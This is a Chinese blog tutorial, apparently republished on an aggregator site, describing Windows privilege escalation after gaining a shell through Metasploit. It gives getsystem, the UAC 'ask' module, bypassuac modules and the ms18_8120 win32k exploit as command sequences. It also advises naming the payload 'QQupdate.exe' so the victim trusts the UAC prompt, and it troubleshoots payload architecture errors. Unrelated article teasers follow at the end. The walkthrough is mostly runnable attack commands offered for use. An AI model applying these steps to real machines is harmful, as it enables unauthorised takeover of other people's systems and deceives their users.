我的内网渗透-提权大法

news/2024/11/9 9:22:41/

拿到shell之后乱码解决

chcp 65001
#将编码设置为UTF-8的编码

 出现这个提示就是切换成功,后面也是可以正常显示的

提权

方法一:

新版本的kali直接getsystem,可以提权成功(有时候可以,有时候不可以)

meterpreter > getsystem

提权成功

方法二:

利用uac(用户账户控制)进行提权。

用户账户控制在涉及管理员权限的时候会提示你是否要这么做,确定的话就是以管理员的身份去运行如果把他拉到从不通知,在涉及需要使用管理员权限的时候就会直接以管理员的身份去运行。

利用uac提权有两种情况

①关闭了通知。在这种情况下,就不需要目标主机进行确认,可以直接提权成功

②开启着通知(默认是开启的,除非手动关闭)。这种情况就需要目标主机去确认,才能进行提权成功。

use exploit/windows/local/ask 
#使用windows的ask模块进行提权
search uac
#或者直接搜寻uac模块,找到ask也可以msf6 exploit(windows/local/ask) > options
#进入模块后直接options查看需要进行哪一些配置msf6 exploit(windows/local/ask) > set session 1
#设置我们要进行提权的会话msf6 exploit(windows/local/ask) > set lport 5555
#这边的端口设置是随意的,不用跟session 1的端口一致msf6 exploit(windows/local/ask) > set filename QQupdate.exe
#设置在目标主机uac弹出的名字,可以更改成一些比较可信的名称
#这里有一个要特别注意的点是需要在修改的文件名后面加上exe,不然在kali中攻击过程没显示报错,但是在目标主机中是弹不出uac窗口的unset filename(或者其他配置名字)
#进行设置重置msf6 exploit(windows/local/ask) > set technique PSH
#将设置成windows处理程序,可信度更高(原本是exe)meterpreter > getsystem
#在目标主机确认之后会重新进入meterpreter模块,然后就可以获取计算机的管理权限

提权所生成的文件在目标主机的 C:\Users\ADMINI~1\AppData\Local\Temp

方法三:

利用bypassuac进行提权。

bypassuac这个是属于内核漏洞,有打补丁的话是不一定能成功的。

这些模块不一定每一个都可以使用,有一些是你系统不存在漏洞,有一些是你系统打了补丁

search bypassuac
#寻找可以绕过uac的脚本模块msf6 exploit(windows/local/bypassuac_eventvwr) > use 0
#选择使用的模块,或者直接跟上模块的名称msf6 exploit(windows/local/bypassuac_windows_store_filesys) > options
#查看一下使用模块的配置,一般只需要设置会话msf6 exploit(windows/local/bypassuac_windows_store_filesys) > set session 1
#设置要进行提权的会话msf6 exploit(windows/local/bypassuac_windows_store_filesys) > run
#直接运行等待结果

报错

1. payload的设置。

[-] Exploit aborted due to failure: bad-config: The payload should use the same architecture as the target。

如果存在这样的问题,那么就需要更改下payload,需要和你之前会话的payload配置保持相同。  

2.[-] Exploit aborted due to failure: no-target: Session and Target arch must match
如果存在这样的报错就是存在windows的位数问题,他后面显示是X86的,我们之前用的是x64的payload。
在用msfvenom生成木马的时候可以不加x64进行木马生成,默认就是生成32位的程序。这样子就不会存在这种报错,不过这样子生成的程序容易存在兼容性问题,在主机中可能会直接进行提示兼容性问题,或者停止程序的运行

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

方法四:

此方法适用于攻击服务器,windows主机很难实现

msf6 exploit(windows/local/bypassuac_eventvwr) > search ms18_8120_win
#查找漏洞msf6 exploit(windows/local/ms18_8120_win32k_privesc) > options
#查看一下要进行设置的配置msf6 exploit(windows/local/ms18_8120_win32k_privesc) > set session 1
#设置要使用的会话msf6 exploit(windows/local/ms18_8120_win32k_privesc) > run
#开始攻击run -j 
#后台运行jobs
#查看监听(是否建立了会话)


http://www.ppmy.cn/news/356577.html

相关文章

谈谈几个常见数据结构的原理

数组 数组是最常用的数据结构,创建数组必须要内存中一块 连续 的空间,并且数组中必须存放 相同 的数据类型。比如我们创建一个长度为10,数据类型为整型的数组,在内存中的地址是从1000开始,那么它在内存中的存储格式如…

Java小知识

一、lambda ()->{} ()中为接口唯一方法中的参数,可以任意取 {}为接口唯一方法中的执行语句,返回的结果类型必须符合接口中方法返回值的定义 原理理解: Public interface Printable{ String print(String suffix);} 在函数式编程中有一个方…

harbor仓库的搭建

harbor仓库的搭建 前言一、准备二、registry私有仓库拉取registry镜像上传镜像下载镜像添加私有仓库解析配置使用非加密端口拉取镜像 三、仓库加密域名保持一致部署客户端证书,不然会报错验证仓库认证删除registry,重建登录仓库,不然无法上传…

计算机启动方式如何选择USB启动,bios设置usb启动的方法

一般的品牌机,例如联想电脑,无论台式机或笔记本,选择u盘制作启动盘的键都是F12,开机的时候按F12键会出现启动项选择界面,从中我们可以选择电脑从什么介质启动,但是bios设置usb启动的方法是什么呢?其实关于bios设置启动的方法有很多,今天小编就为大家介绍bios设置usb启动…

u大师u盘装系统win7_使用U盘安装Win7/Win8/Win10系统完美教程

通用PE U盘安装Win7/Win8/Win10完美教程(多图) 首先准备一个4G以上的U盘 一台能正常使用的电脑 下载通用pe工具箱最新版 最新版下载地址 TongYongPe_V10.3.4.20 百度云链接: https://pan.baidu.com/s/1VijyBJuG8QDHr7rz8Ks8oA 提取码:5idh 一、接下来制作…

U启动PE装机工具

导读: u盘怎样安装原版win7系统?如何使用u启动u盘装系统工具重装原版win7系统?u启动小编教大家如何使用u启动制作的u盘来安装原版 Win7系统! u启动u盘装系统需要准备? 1.一个已经使用u启动制作好启动盘的u盘。 关于如何使用u启动…

瑞星linux u盘引导盘杀毒教程,瑞星杀毒U盘怎样用U盘启动电脑

2018-01-15 电脑怎么设置u盘启动_电脑怎样设置u盘启动 现在的电脑、笔记本光驱已经越来越少了,甚至都不配光驱了。U盘则是越来越多了,不管是装系统还是维护电脑,U盘系统成了必不可少的工具。那电脑要怎么设置从U盘启动呢?下面跟安下小编一起来看看。提示:若使用U盘启动盘制作工…

win7开机卡在正在启动_Win7系统崩溃后小白的终极解决方案,看一遍你也会

WIN7系统蓝屏崩溃了你是不是心急如焚,不知所措。头条是算法推荐文章,既然你刷到了这篇文章,说明你有可能需要,点赞,转发,保存收藏吧! 第一步,准备工作: 1、一个8G优盘。 2、一台可以上网的电脑(网吧、朋友家的都可以,系统不影响)。 3、一个会用鼠标键盘看得懂文字的人…